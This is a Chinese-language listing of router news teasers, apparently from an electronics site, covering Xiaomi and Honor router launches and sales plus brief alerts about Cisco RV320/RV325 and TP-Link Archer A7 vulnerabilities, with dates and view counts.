和验证。该组漏洞主要对Cisco RV320和RV325两款双千兆WAN VPN路由器造成影响，两个漏洞结合利用可以达到允许未经身份授权的远程攻击者执行任意命令的目的。对此，安天微嵌分析小组验证了该漏洞的原理及POC，对该漏洞的影响范围进行了确认，并给出了相应的防护建议。

2019-05-17 15:44:57

3303

小米路由器HD和荣耀路由Pro2哪个好

买荣耀路由Pro 2还是小米路由器HD？作为目前两款热销的路由产品，荣耀路由Pro 2和小米路由器HD不免会被各自的粉丝拿来进行比较！那么，荣耀路由Pro 2和小米路由器HD哪个好？是该买荣耀路由

2019-07-19 11:47:39

10442

小米路由器获天猫38女神节首日路由器行业品牌销售额第一

天猫38女神节首日，小米路由器荣获“路由器行业品牌销售额”第一。即日起至3月8日，小米路由器最高直降100元，全场低至59元起。

2020-03-07 15:12:50

2074

TP-Link命令注入漏洞警报

根据ZDI分析报告，受影响的路由器中的二进制程序/usr/bin/tdpServer中存在命令注入漏洞。此二进制程序运行在TP-Link Archer A7（AC1750）路由器上，硬件版本5，MIPS体系结构，固件版本190726。

2020-05-01 17:33:00

1425

小米路由器也支持WiFi6+是真是假

小米路由器官方微博正式宣布，小米AloT路由器AX3600今天起将陆续推送OTA更新。此次升级非常重要，手上拥有小米路由器AX3600的用户不容错过。

2020-05-14 11:40:38

9111

如何利用路由器远程运维

什么是4G工业路由器？如何利用路由器远程运维？工业路由器都有些什么功能？这些问题我们平时在使用路由器或项目中都可能会遇到。

2020-06-03 10:54:01

1157

小米路由器速率高达6000兆级

小米将于12月28日发布小米11新品，届时小米高端路由器新品也将同台亮相。

2020-12-24 10:44:16

2820

小米路由器AX6000正式上架京东开售

在2020年12月28日的小米11新品发布会上，小米发布了首款支持“Wi-Fi6增强版”技术的高端新品路由器：小米路由器AX6000。

2020-12-29 09:45:16

3504

小米AIoT路由器AX6000全渠道开启预约

稍早前，小米路由器官微正式官宣，即将推出小米路由器WiFi6增强版。12月28日，小米11系列手机发布会正式开幕，会上由雷军发布了小米首款支持“Wi-Fi 6增强版”技术的高端路由器——小米AIoT路由器AX6000。小米官方介绍称其是小米最高端路由器，这款产品售价599元。

2020-12-29 10:51:30

2013